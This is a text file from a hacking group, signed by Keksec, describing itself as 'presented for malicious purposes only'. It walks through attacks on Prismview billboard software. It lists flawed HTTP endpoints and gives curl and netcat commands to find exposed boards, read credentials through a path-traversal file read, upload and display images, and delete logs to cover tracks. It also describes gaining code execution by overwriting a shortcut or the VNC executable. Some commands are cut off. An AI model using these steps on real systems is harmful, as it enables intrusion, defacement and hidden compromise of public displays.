prismview.txt - billboard software














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                                            INNOVATORS IN KEK─BASED TEKNOLOGY
                                            EXPERTS IN RESPONSIBLE DISCLOSURE
                                            GENERAL ALL-AROUND COOL D00DZ

                               ║ prismview.txt ║
             ┃   This file is presented for malicious purposes   ┃
             ┃      only. Keksec takes no responsibility for     ┃
             ┃     the use of the information in this file by    ┃
             ┃   shit-eating whitehats, or for the patching of   ┃
             ┃   any vulnerabilities disclosed in this file by   ┃
             ┃                   butthurt SWEs.                  ┃

    Are we still live?...

    Ah, there you are! Our faithful friend! Our fantastic follower! We're
    very sorry for being gone for so long. Sadly, as with all things, we
    have weened and waned in and out of existence. Heat has come and gone.
    Boxes, shells, and exploits too have seen the light of day only to be
    snuffed out by zealous whitehats. Somehow, despite the religious fervor
    of the whitehat, our billboard vulns haven't been killed. You shitters
    really dropped the ball. No, YESCO, telling customers to move boards
    behind a VPN is *not* a patch. In this file we're dropping the deetz on
    YESCO's (and now Samsung's) Prismview billboard software.

    Public Disclosure Timeline:
     Found: maliciously
     Contacted vendor: technically
     Disclosed publicly: affirmatively


    It should first be said that Prismview is a piece of software as well
    as a company. The company was owned by YESCO, under which it developed
    the initial Prismview software and was then sold to Samsung. The
    Prismview software is simply a C# HTTP server which runs on an embedded
    Windows installation. It handles scheduling for different images as
    well as diagnostics. These Windows installations also come standard
    with VNC, AV (usually Mcafee or Kaspersky), and other basic software.

    Since developing that software Prismview was sold to Samsung and it
    would seem that they've transitioned to a model similar to Lamar's.
    We would like to take this time to remind Samsung, again, that shoving
    your shit behind a VPN does not make it secure.


    In order to control a Prismview billboard, a client program is provided
    which implements calls to an HTTP API on the YESCO Prismview server
    (referred to as Prismview from now on). All of these operations occur
    within the Prismview install directory (%USERPROFILE\Prismview Player),
    and all directories mentioned from now on are within that directory
    unless specified otherwise. Here we will go over some endpoints of

    Responds with "OK" if the current IP is logged in or authentication is
    disabled. We would tell you which endpoints require authentication but,
    as seems to be the Prismview way, this varies between releases.

    Takes two headers, "User" and "Password", and checks if they are equal
    to the value configured. If so, it adds the requesting IP to a list of
    logged in users. Returns "OK Password" on success or
    "OK Password - Not Applicable" if the password was correct but
    authentication is disabled.

    Clears the Joiner\ directory. Responds with "OK" on success.

    Takes a multipart octet stream and saves it to the file name specified
    by the multipart within the Joiner\ directory. Responds
    "File Uploaded." on success.

    Reads the file at Joiner\SplitterInfo.xml with the format

      <OutputPathAndNameUnicoded>../path :^)</OutputPathAndNameUnicoded>

    If NumberOfFiles is 3, for example, it will concatenate XferFile.0,
    XferFile.1, and XferFile.2. It will then write the result of this
    concatenation to OutputPathAndNameUnicoded within the XFER directory.
    Doesn't sanitize OutputPathAndNameUnicoded. Responds "OK" on success.

    Runs the RebootSystem.lnk file in the Prismview directory.

    Runs the RestartPlayer.lnk file in the Prismview directory.

    Kills all processes with the name "WinVNC" and tries to run the
    following programs in order with the single argument "-run":
     C:\Program Files\UltraVNC\WinVNC.exe

    Takes a multipart octet stream and the file name, creation year, month,
    day, hour, minute, second, and another option which is simply left as
    "NA" as comma separated values in HTTP header "prismxfer001". An
    example is given in the next section.

    Takes a multipart octet stream and the following HTTP headers:
     PrismXfer-DestName (base64 encoded upload path)
    Writes the file to to XFER\. Doesn't sanitize DestName.

    Returns a JPEG screen capture of the running server.

    Only has to start with /PV9COMMAND. The request path is then split by
    the character '|' and continues only if the resulting array is larger
    than 1. The first entry in this resulting array is used as the command,
    and the rest are arguments. For example, given that you requested the
    path "/PV9COMMAND|INSTANTPLAY1|image.jpg|99", it would run the
    INSTANTPLAY1 command with arguments "image.jpg" and "99". Some commands
    offered are as follows:
      Plays the image at OperatingMedia/{PATH} REPEATS times on whatever is
      attached to the Prismview server. Doesn't sanitize PATH.
      The same as INSTANTPLAY1 except if there is a file at XFER/Media it
      will copy that file into OperatingMedia prior to playing it.
      Deletes the file at XFER\{PATH}. Doesn't sanitize PATH.
      Creates a directory at XFER\{PATH}. Again, doesn't sanitize PATH.

    If the Prismview server can't find an endpoint to handle a request with,
    it searches in OperatingMedia/ for the file requested. It doesn't check
    for LFI and is very stupid. That XML file contains the username and
    password required to authenticate with the Prismview server.

    It should also be remembered that the Prismview team was immensely
    disorganized in creating the Prismview software. Depending on the
    version, any number of these endpoints will actually exist. Thankfully,
    the Prismview executable is usually at the same place across version.
    You can simply use the LFI to download the executable and open it in
    your favorite C# decompiler. The most obviously broken code is in
    UserControlWebServer class or one named similarly.

    There are far more endpoints of course, but we feel this will give you
    at least some idea as to the workings of Prismview.

    Now we will work you through how a master hacker like yourself might go
    about finding and exploiting these billboards.

    Prismview uses the WeOnlyDo C# webserver API, so some early versions
    use that as their HTTP Server header. Later versions simply use some
    variation of "Prismview Player". Shodan searches will bring back a few
    but not many. More can be found with more comprehensive scans of
    business or 4G IP ranges.

    You can then find out if authentication is enabled or not by requesting

    # If authentication is disabled you will see something like this
    $ curl http://LAME/AMILOGGEDIN

    # If it is enabled, you will see this
    $ curl http://LAME/AMILOGGEDIN

    If you see "Failed", don't worry. We can simply use our handy dandy LFI
    to obtain the Username and Password properties of the configuration

    # Note that the name of this file and possibly its location vary per
    # release. We leave figuring this out as an exercise for the reader :^)
    $ echo -e 'GET /../PrismviewV9-Player-006.xml HTTP/1.0\r\n' \
      | nc LAME 80

    You can then authenticate with the server

    $ curl -H'User: bkrebs' -H'Password: god' http://LAME/PRISMVIEWLOGIN001
    OK Password

    And use one of the many methods available to upload your image

    $ mv image.jpg XferFile.0
    $ curl -F file=@XferFile.0 http://LAME/SPLITUPLOAD
    File uploaded.
    $ echo 'PEZpbGVTcGxpdHRlckpvaW5lckluZm9QYWNrZXQ+CiAgPE91dHB1dFBhdGhB'\
	   | base64 --decode > SplitterInfo.xml
    $ curl -F file=@SplitterInfo.xml http://LAME/SPLITUPLOAD
    File uploaded.
    $ curl http://LAME/SPLITJOIN


    $ curl -F file=@image.jpg -H'prismxfer001: 2011,11,11,11,11,11,NA' \


    $ curl -F file=@image.jpg \
      -H'PrismXfer-DestName: SEFLS0EgSEFLS0EgSEFLS0E=' \
      -H'PrismXfer-FileLength: 632094'
      -H'PrismXfer-FileLastWriteTimeUTC: 2015-03-03-T00:00:00' \
      -H'PrismXfer-MD5Checksum: 07094d279ef4502e07477fa58631113b' \


    Depending on where you uploaded your image to there are several ways to
    play it. The laziest would be to refresh the home page and wait until
    an image is playing with the same file extension as the one you wish to
    put up. Then you can simply upload your image over that file and it
    will play the next time the schedule loops around. If you can't find an
    image with the same extension, just upload the image file to
    OperatingMedia\ and play it using INSTANTPLAY1.

    $ curl 'http://LAME/PV9COMMAND|INSTANTPLAY1'\

    If you're lazy you're done here. If not, you probably want to at least
    unlink the logs.

    SystemLog-06-08-37.lg 344 6/8/1337 12:00 AM
    SystemLog-06-08-37.lg 344 6/9/1337 12:00 AM
    SystemLog-06-08-37.lg 344 6/10/1337 12:00 AM
    SystemLog-06-08-37.lg 344 6/11/1337 12:00 AM
    $ curl 'http://LAME/PV9COMMAND|DELETEFILE1|Log\SystemLog-06-08-37.lg'

    Getting code execution is fairly easy as well. Just upload a file to
    overwrite RebootSystem.lnk in the Prismview directory or any of the
    WinVNC.exes and then request /REBOOTSYSTEM or /RESTARTVNC to execute


    In conclusion, fuck YESCO, fuck Samsung, and fuck Prismview.
    <3 keksec


    greets to thugcrowd and conflict ;-*